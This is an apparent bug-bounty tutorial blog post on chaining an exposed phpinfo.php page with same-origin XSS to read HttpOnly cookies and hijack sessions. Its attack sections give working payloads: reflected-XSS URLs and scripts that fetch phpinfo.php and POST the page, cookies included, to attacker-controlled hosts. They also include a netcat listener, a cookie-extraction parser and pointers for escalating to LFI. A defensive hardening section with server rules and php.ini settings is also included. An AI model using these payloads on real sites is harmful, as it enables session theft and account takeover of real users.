From Info Disclosure to Account Takeover: How Hackers Chain phpinfo.php with XSS for Maximum Bounty


Introduction:

A lone `phpinfo.php` file is often dismissed as a trivial information disclosure finding by novice bug bounty hunters, leading to low-priority reports and missed opportunities. Seasoned offensive security engineers know that impact comes from vulnerability chaining, which turns seemingly benign data leaks into critical attack vectors. This article walks through a technique in which `phpinfo.php` is combined with Cross-Site Scripting (XSS) on the same origin: because `phpinfo()` prints the raw `Cookie` request header into the page body, a script that fetches the page can read cookies that the `HttpOnly` flag would otherwise keep away from JavaScript. Note that any maintained PHP release HTML-escapes the values `phpinfo()` prints, so on a patched server the XSS must come from another flaw on the same origin; `phpinfo.php` is then the HttpOnly bypass, not the injection point.

Learning Objectives:

  • Understand how to systematically analyze a `phpinfo.php` output for chaining potential with other vulnerabilities.
  • Learn the step-by-step methodology to exploit an information disclosure flaw to enhance an XSS attack and steal session cookies.
  • Master defensive configurations for Apache, Nginx, and PHP to mitigate these risks and harden web applications.

You Should Know:

1. Identifying and Accessing the phpinfo.php File

The first step is locating this common, often accidentally exposed, file. Attackers use automated scanners and manual fuzzing to discover it, as it can reveal the application’s internal state.

Step-by-step guide:

  1. Automated Discovery: Use tools like `dirb`, `gobuster`, or `ffuf` to brute-force common paths.
    # gobuster (Linux/Windows, Go binary); -x php appends the extension to every word
    gobuster dir -u https://target.com/ -w /usr/share/wordlists/common.txt -x php
    # Same idea with ffuf
    ffuf -w /usr/share/wordlists/common.txt -u https://target.com/FUZZ.php
    
  2. Manual Checking: Navigate to suspected common paths in a browser or with cURL.
    curl -v https://target.com/phpinfo.php
    
  3. Analyze Response: A successful find returns a large HTML page describing the PHP build and configuration. For chaining, the important property is that the page echoes request data back: the `$_GET`, `$_COOKIE` and `$_SERVER` tables contain whatever the browser sent, including the `Cookie` header. Current PHP runs these values through `htmlspecialchars()`, so on a patched server the page is a data source for a same-origin XSS rather than an XSS sink in its own right.

2. Analyzing phpinfo Output for Attack Vectors

`phpinfo()` displays the request superglobals `$_GET`, `$_POST`, `$_COOKIE`, `$_FILES` and `$_SERVER` in its “PHP Variables” section. An attacker scrutinizes this data for sensitive details and, crucially, for proof that user input is reflected on the page and for how it is encoded when it comes back.

Step-by-step guide:

  1. Locate the `$_GET` Section: Scroll or search the `phpinfo.php` page for the section titled “PHP Variables” or specifically “$_GET”.
  2. Identify Reflection: Any parameter sent to the page (e.g., ?test=value) appears here, so request data is reflected in the output. Check how it comes back: on a patched PHP build the value is HTML-encoded, so `<` arrives as `&lt;`; only a long-unpatched legacy build echoes it raw, which is the case that turns `phpinfo.php` itself into an XSS sink.
  3. Gather Intelligence: Note DOCUMENT_ROOT, SCRIPT_FILENAME, loaded extensions, and OS details. This aids further exploitation.
    # Use cURL and grep to quickly check for reflection (a bare key with no '=' is enough to populate $_GET)
    curl -s "https://target.com/phpinfo.php?TESTPAYLOAD" | grep -A 2 -B 2 "TESTPAYLOAD"
    

3. Crafting the XSS Payload for phpinfo.php

The core of the attack is getting a script to run in the `phpinfo.php` origin. If the target runs a long-unpatched legacy PHP build that echoes `$_GET` values unescaped, the injection point can be `phpinfo.php` itself, via a URL parameter reflected in the `$_GET` table. On current PHP those values are HTML-encoded and the payload below is simply displayed as text; in that case the same payload is delivered through any other XSS on the same origin, and the rest of the chain is unchanged.

Step-by-step guide:

  1. Basic Payload Test: Confirm the XSS by injecting a simple alert. If the page shows the tag as text instead of popping the alert, `phpinfo.php` is escaping input and another XSS sink on the origin is needed.
    https://target.com/phpinfo.php?<script>alert(document.domain)</script>
    
  2. Build Cookie Stealer: Create a payload that sends the page’s content (which includes the victim’s cookies, printed by `phpinfo()` from the `Cookie` request header into the `$_COOKIE` and `$_SERVER` tables) to an attacker-controlled server. The page is tens of kilobytes, far more than a URL query string can carry, so it is sent as a POST body; `mode: 'no-cors'` keeps it a simple request that needs no CORS headers on the receiving side.
    <script>
    fetch('https://attacker-server.com/steal', {method: 'POST', mode: 'no-cors', body: document.body.innerHTML})
    </script>
    
  3. URL Encoding: Encode the payload for delivery via a URL.
    # Using Python for quick encoding
    python3 -c "import urllib.parse; print(urllib.parse.quote('<script>fetch(\"https://attacker.com/steal\", {method: \"POST\", mode: \"no-cors\", body: document.body.innerHTML})</script>'))"
    

4. Bypassing HttpOnly with phpinfo Chaining

The `HttpOnly` cookie flag prevents JavaScript from reading a cookie through `document.cookie`. It does nothing about the server printing the cookie somewhere else: `phpinfo.php` displays every request header, including the `Cookie` header, as `$_SERVER['HTTP_COOKIE']`, and again cookie by cookie in the `$_COOKIE` table. Script running on the same origin can fetch `phpinfo.php` with the victim’s cookies attached and read them out of the response body, which is exactly what `HttpOnly` was meant to prevent.

Step-by-step guide:

  1. Setup Listener: Start a listener on your server to receive the stolen data. A plain netcat listener is enough in a lab where the target is served over plain HTTP and the payload points at `http://<your-ip>:8080`; if the target is HTTPS, browsers block the mixed-content request to an `http://` endpoint, so the collector must speak TLS.
    nc -nlvp 8080
    
  2. Craft the Final Payload: The payload must make the victim’s browser load `phpinfo.php` from the same origin (so the session cookie is sent) and deliver the response body (which contains the cookies) to you. The body is posted rather than base64-packed into a URL, because a phpinfo page is far larger than any server accepts in a query string.
    <script>
    var xhr = new XMLHttpRequest();
    xhr.open('GET', '/phpinfo.php', true);   // same origin, so cookies ride along, HttpOnly or not
    xhr.onload = function () {
      // POST the raw page; no-cors keeps this a simple request with no preflight
      fetch('https://attacker-server.com/log', {method: 'POST', mode: 'no-cors', body: xhr.responseText});
    };
    xhr.send();
    </script>
    
  3. Deliver the Payload: The attacker must get a victim to execute the script on the target origin, often via a reflected XSS in another page of the same application, a phishing link, or a stored XSS post.
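As an added example (not code from the original post), the script below works offline against a constructed fragment of a `phpinfo()` response, so the moving parts of the chain can be checked before they go into a live payload: whether an injected marker came back raw or HTML-escaped (the reflection test from section 2), pulling the cookies out of the echoed `Cookie` header (the HttpOnly bypass above), and keeping the path intel for later. The only layout it assumes is the standard `phpinfo()` variable row, `<td class="e">NAME</td><td class="v">VALUE</td>`; the cookie and path values in the sample are made up.

```javascript
// Added example, not code from the original post. Runs offline (node) on a
// constructed phpinfo() fragment. Assumed layout: the standard phpinfo()
// variable rows <tr><td class="e">NAME</td><td class="v">VALUE</td></tr>.

// Constructed sample: part of the "PHP Variables" section as a current PHP
// returns it to a browser that sent ?q=<script>alert(1)</script> and two
// cookies. Every value here is made up.
const SAMPLE_PHPINFO = [
  '<h2>PHP Variables</h2>',
  '<table>',
  '<tr><td class="e">$_GET[\'q\']</td><td class="v">&lt;script&gt;alert(1)&lt;/script&gt;</td></tr>',
  '<tr><td class="e">$_COOKIE[\'PHPSESSID\']</td><td class="v">8f3a1c2d9e0b4f5a6c7d8e9f0a1b2c3d</td></tr>',
  '<tr><td class="e">$_SERVER[\'HTTP_COOKIE\']</td><td class="v">PHPSESSID=8f3a1c2d9e0b4f5a6c7d8e9f0a1b2c3d; auth=abc.def&amp;1</td></tr>',
  '<tr><td class="e">$_SERVER[\'DOCUMENT_ROOT\']</td><td class="v">/var/www/html</td></tr>',
  '<tr><td class="e">$_SERVER[\'SCRIPT_FILENAME\']</td><td class="v">/var/www/html/phpinfo.php</td></tr>',
  '</table>',
].join('\n');

// The same fragment as a very old, unpatched phpinfo() would have emitted it:
// the $_GET value echoed without escaping, i.e. a live XSS sink.
const SAMPLE_LEGACY_PHPINFO = SAMPLE_PHPINFO.replace(
  '&lt;script&gt;alert(1)&lt;/script&gt;', '<script>alert(1)</script>');

// phpinfo() runs values through htmlspecialchars(); undo that to get the
// original bytes of the Cookie header back.
function decodeEntities(s) {
  return s
    .replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>')
    .replace(/&quot;/g, '"')
    .replace(/&#0*39;/g, "'")
    .replace(/&amp;/g, '&');   // last, so "&amp;lt;" does not turn into "<"
}

function escapeHtml(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// Turn the variables table into { "$_SERVER['HTTP_COOKIE']": "...", ... }.
function parsePhpinfoVars(html) {
  const row = /<td class="e">([^<]+)<\/td>\s*<td class="v">([\s\S]*?)<\/td>/g;
  const vars = {};
  let m;
  while ((m = row.exec(html)) !== null) {
    vars[decodeEntities(m[1].trim())] = decodeEntities(m[2].trim());
  }
  return vars;
}

// Did the marker we sent come back, and if so raw or escaped? 'raw' means
// phpinfo.php itself is an XSS sink; 'escaped' means the XSS has to come
// from another flaw on the same origin.
function reflectionStatus(html, marker) {
  if (html.includes(marker)) return 'raw';
  if (html.includes(escapeHtml(marker))) return 'escaped';
  return 'absent';
}

// Pull cookies out of the Cookie header phpinfo() echoed. HttpOnly is
// irrelevant here: the server printed the header into the HTML body.
function extractCookies(vars) {
  const header = vars["$_SERVER['HTTP_COOKIE']"] || '';
  const cookies = {};
  for (const part of header.split(';')) {
    const eq = part.indexOf('=');
    if (eq < 0) continue;
    cookies[part.slice(0, eq).trim()] = part.slice(eq + 1).trim();
  }
  // Fallback for pages where HTTP_COOKIE is absent: the per-cookie rows.
  for (const [name, value] of Object.entries(vars)) {
    const cm = name.match(/^\$_COOKIE\['([^']+)'\]$/);
    if (cm && !(cm[1] in cookies)) cookies[cm[1]] = value;
  }
  return cookies;
}

// The $_SERVER entries worth keeping for later LFI and path work.
function gatherIntel(vars) {
  const out = {};
  for (const k of ['DOCUMENT_ROOT', 'SCRIPT_FILENAME', 'SERVER_SOFTWARE']) {
    const v = vars[`$_SERVER['${k}']`];
    if (v !== undefined) out[k] = v;
  }
  return out;
}

// Stand-alone run on the constructed samples.
const demoVars = parsePhpinfoVars(SAMPLE_PHPINFO);
console.log(reflectionStatus(SAMPLE_PHPINFO, '<script>alert(1)</script>'));        // escaped
console.log(reflectionStatus(SAMPLE_LEGACY_PHPINFO, '<script>alert(1)</script>')); // raw
console.log(extractCookies(demoVars));
console.log(gatherIntel(demoVars));
```

Run it with node. In a live payload the same `extractCookies(parsePhpinfoVars(html))` call on the fetched response lets you exfiltrate a few hundred bytes of cookies instead of the whole page, which is quieter and sidesteps the URL-length problem entirely.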

5. Post-Exploitation and Defensive Hardening

Once session cookies are captured, the attacker can set them in their own browser and perform a session hijacking attack, impersonating the victim for as long as the session stays valid.

Step-by-step guide for Defenders:

  1. Locate and Remove: Proactively search for and delete any script that calls `phpinfo()` on production servers. Search by content rather than by the name `phpinfo.php` alone, since developers leave such files under names like `info.php` or `test.php`.
    # Find every PHP script under the web root that calls phpinfo()
    find /var/www -type f -name '*.php' -exec grep -lE 'phpinfo[[:space:]]*\(' {} +
    
  2. Server Configuration (Apache/Nginx): Block access to the usual info-file names via server rules. This is a backstop for the previous step, not a replacement for it.
    # Nginx: place this before the location that hands *.php to PHP-FPM,
    # since the first matching regex location wins and the file must never execute
    location ~* /(phpinfo|info)\.php$ {
        return 403;
    }
    
    # Apache 2.4 (.htaccess needs AllowOverride, or put it in the vhost config)
    <FilesMatch "^(phpinfo|info)\.php$">
        Require all denied
    </FilesMatch>
    
  3. PHP.ini Hardening: Set `expose_php = Off` in `php.ini` to remove the `X-Powered-By` version header. That hides the version from casual scanning but does not disable `phpinfo()`; add `phpinfo` to the `disable_functions` directive so a forgotten file prints nothing even if it is reachable.

6. Advanced Chaining: From Cookies to Remote Code Execution

The `phpinfo()` data can reveal paths, versions, and configurations that enable further escalation, such as Local File Inclusion (LFI) or framework exploits.

Step-by-step guide:

  1. Use Intel for LFI: The `SCRIPT_FILENAME` and `DOCUMENT_ROOT` values take the guesswork out of LFI payloads, whether the target is a system file like /etc/passwd or the application’s own configuration files under the document root; the `open_basedir` and `allow_url_include` settings shown in the configuration tables tell you in advance which include tricks will be blocked.
  2. Chain with Known Exploits: The exact PHP version and loaded modules shown on the page can be matched against public advisories and exploits.
  3. Automate with Tools: Web scanners such as Nikto flag exposed `phpinfo()` pages during discovery; save the full page when you find it, since it will usually disappear once reported and the intel in it guides every later step.

What Undercode Say:

  • The Mindset is the Multiplier: The critical factor separating novice and expert hunters isn’t the tool, but the operational mindset of seeing vulnerabilities as interconnected components rather than isolated findings. Chaining is a force multiplier.
  • Context Defines Criticality: A finding’s severity is not inherent; it is defined by its surrounding technical context and the attacker’s creativity. `phpinfo.php` in a vacuum is low, but `phpinfo.php` in an application with other flaws can be catastrophic.

This technique underscores a fundamental principle in modern application security: defenses are only as strong as their weakest linked component. The future impact of such chaining attacks will grow with the increasing complexity of web applications and microservices architecture. We predict a rise in AI-assisted vulnerability correlation tools that automatically suggest chaining paths to attackers, making these compound exploits more common. Conversely, this will push the security industry towards more holistic, attack-path-aware vulnerability scoring systems like the latest CVSS v4.0 and the development of automated security controls that hunt for and sever these links between seemingly minor issues.

Reported By: Faiyaz Ahmad – Hackers Feeds